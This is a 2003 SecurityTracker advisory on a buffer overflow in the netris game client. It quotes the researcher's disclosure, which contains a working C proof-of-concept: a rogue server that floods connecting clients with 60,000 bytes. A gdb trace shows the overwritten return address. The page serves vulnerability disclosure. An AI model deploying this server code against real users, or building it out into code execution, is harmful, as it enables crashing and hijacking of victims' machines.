SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Game)  >  netris Vendors:  Weaver, Mark H.
netris Client Buffer Overflow May Let Remote Servers Execute Arbitrary Code on the Client
SecurityTracker Alert ID:  1007545
CVE Reference:  CAN-2003-0685   (Links to External Site)
Date:  Aug 21 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.52 and prior versions
Description:  A buffer overflow vulnerability was reported in the netris game. A remote user acting as a netris server can cause arbitrary code to be executed on a connected netris client.

It is reported that the software does not properly validate the bounds of user-supplied data (received from the server). A remote server can send specially crafted data to a connected netris client to trigger a buffer overflow, resulting in the execution of arbitrary code with the privileges of the netris client.

A demonstration exploit is provided in the Source Message.
Impact:  A remote user (acting as a netris server) can cause arbitrary code to be executed on a connected netris client. The code will run with the privileges of the user running the netris client.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.netris.org/ (Links to External Site)
Cause:  Boundary error
Reported By:  Shaun Colley <shaunige@yahoo.co.uk>
Message History:   None.

 Source Message Contents
Date:  Tue, 12 Aug 2003 18:03:02 +0100 (BST)
From:  =?iso-8859-1?q?Shaun=20Colley?= <shaunige@yahoo.co.uk>
Subject:  Netris client Buffer Overflow Vulnerability.

 

-[INTRODUCTION]-

Netris is a Linux clone of the classic infamous game
Tetr*s, giving users three main game modes:  play an
individual game, server mode: bind to a port and wait
for an incoming connection from an opponents Netris
client, and connect mode: connect to an opponents
Netris client which is listening for connections on a
selected port.  A vulnerability has already been
discovered
(http://www.securityfocus.com/bid/5680/info/) that
when Netris is ran in listen mode, it leaves itself
open to a "critical" buffer overflow vulnerability due
to insufficient bounds checking, which could result in
root privileges for the attacker, else the UID of the
user running Netris.  However, I have discovered a new
vulnerability in which Netris is also vulnerable to a
similar buffer overflow attack when running in client
mode (connecting to a remote opponents Netris client
in listen mode, rather than listening for an incoming
connection), due to insufficient bounds checking of
what the server sends.

-[EXPLOIT]-

The following code is a small PoC exploit program I
have written to exploit the existing buffer overflow
vulnerability, causing DoS (corruption of stack,
crashing of Netris program), which binds itself to a
port, and exploits the Buffer Overflow Vulnerability
in the Netris program, when a Netris client attempts
to connect:-


------------------------CUT HERE----------------------

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define BACKLOG 1
int main(int argc, char *argv[]) {
        if(argc < 2) {
                printf("Usage: %s <port>\n", argv[0]);
                exit(-1);
        }

        int sock, csock, i;
        struct sockaddr_in client;
        struct sockaddr_in me;
        int sinlen;
        char buffer[60001];

        memset(buffer, 'a', 60000);

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) ==
NULL) {
                printf("Couldn't create socket!\n");
                exit(-1);
        }

        me.sin_family = AF_INET;
        me.sin_port = htons(atoi(argv[1]));
        me.sin_addr.s_addr = INADDR_ANY;
        if(bind(sock, (struct sockaddr *)&me,
sizeof(struct sockaddr)) == -1) {
        perror("bind()");
        exit(-1);
        }
        listen(sock, BACKLOG);
        printf("Listening on port %s for
connections...\n", argv[1]);
        sinlen = sizeof(struct sockaddr);
        while(1) {
                csock = accept(sock, (struct sockaddr
*)&client, &sinlen);
                printf("Got connection,
sending...\n");
                send(csock, buffer, strlen(buffer),
0);
                sleep(1);
                close(csock);
        }
 
------------------------CUT HERE----------------------


Here is a simple example of the exploitation process
of the Netris program:

------------------------CUT HERE----------------------

[shaunige@localhost exploits]$ ./netris-exploit 1234
Listening on port 1234 for connections...
Got connection, sending...  

# whilst meantime in the other window:

[shaunige@localhost shaunige]$ netris -c localhost -p
1234
Your opponent is using an old, incompatible version
                                                   of
Netris.  They should get the latest version.
                  Segmentation fault (core dumped)

[shaunige@localhost shaunige]$ gdb -c core.13140
GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General
Public License, and you are
welcome to change it and/or distribute copies of it
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show
warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu".
Core was generated by `netris -c localhost -p 1234'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) quit
[shaunige@localhost shaunige]$

------------------------CUT HERE----------------------

As you can see, I tried to connect to what I thought
was my to-be opponents Netris program in listen mode,
and the listening server sent a huge string to the
client, overflowing the buffer in which Netris is
expecting to receive greetings from the remote Netris
program, asking it to start the game.

Obviously, the vulnerability can be instead exploited
by an attacker to execute arbitrary code on the
victim's machine, with the privileges of the user
running Netris to connect to the listening port,
rather than simply causing a DoS situation.


-[PATCH/WORKAROUND]-

I have not yet written a patch to fix this
vulnerability in Netris, I am in the process of
contacting the vendor regarding this matter.


-[CREDIT]-

I discovered this vulnerability on 11/08/03.



Thank you for your time.
Shaun.






________________________________________________________________________
Want to chat instantly with your online friends?  Get the FREE Yahoo!
Messenger http://uk.messenger.yahoo.com/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC